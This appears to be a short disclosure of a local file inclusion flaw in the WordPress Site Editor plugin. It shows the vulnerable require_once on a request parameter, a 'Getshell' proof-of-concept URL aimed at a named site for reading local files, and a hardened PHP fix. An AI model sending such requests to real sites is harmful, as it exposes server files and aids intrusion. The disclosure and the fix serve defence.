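The vulnerable file is located at:
wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php
If the path supplied in ajax_path exists, it is included with require_once; if it does not exist, an error is returned. Because the file_exists function can only check local files, the inclusion is limited to files on the local file system.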
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){
    require_once $_REQUEST['ajax_path'];
}else{
    echo json_encode( array(
        'success' => false,
        'message' => "Error: didn't load shortcodes pattern file",
    ) );
    return ;
}
Getshell:
http://www.cesafe.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=<absolute or relative path of the file to read>
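A hardened form of the include shown above, as an added example that is not the plugin's own code or its official fix: the request may name only a bare file inside one fixed directory, and the resolved path is checked to stay inside it. The PATTERN_DIR location and the resolve_pattern_file() helper are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for the require_once on $_REQUEST['ajax_path'].
// PATTERN_DIR is an assumed location for legitimate pattern files, not taken from the plugin.
define('PATTERN_DIR', __DIR__ . '/patterns');

/**
 * Hypothetical helper: return the canonical path of a pattern file inside
 * $baseDir, or null when the request must be rejected.
 */
function resolve_pattern_file($requested, $baseDir)
{
    // Reject missing values and arrays (ajax_path[]=x).
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // Accept a bare file name only: no directory separators, no "..",
    // no stream wrappers, no NUL bytes.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $real === false) {
        return null; // base directory or requested file does not exist
    }
    // realpath() resolves symlinks, so a link pointing outside the base
    // directory fails this prefix check.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($real) ? $real : null;
}

$requested = isset($_REQUEST['ajax_path']) ? $_REQUEST['ajax_path'] : null;
$file = resolve_pattern_file($requested, PATTERN_DIR);

if ($file !== null) {
    require_once $file;
} else {
    echo json_encode(array(
        'success' => false,
        'message' => "Error: didn't load shortcodes pattern file",
    ));
    return;
}
```

With this check, absolute paths, relative traversal sequences and any file outside the fixed directory all fall through to the existing error response.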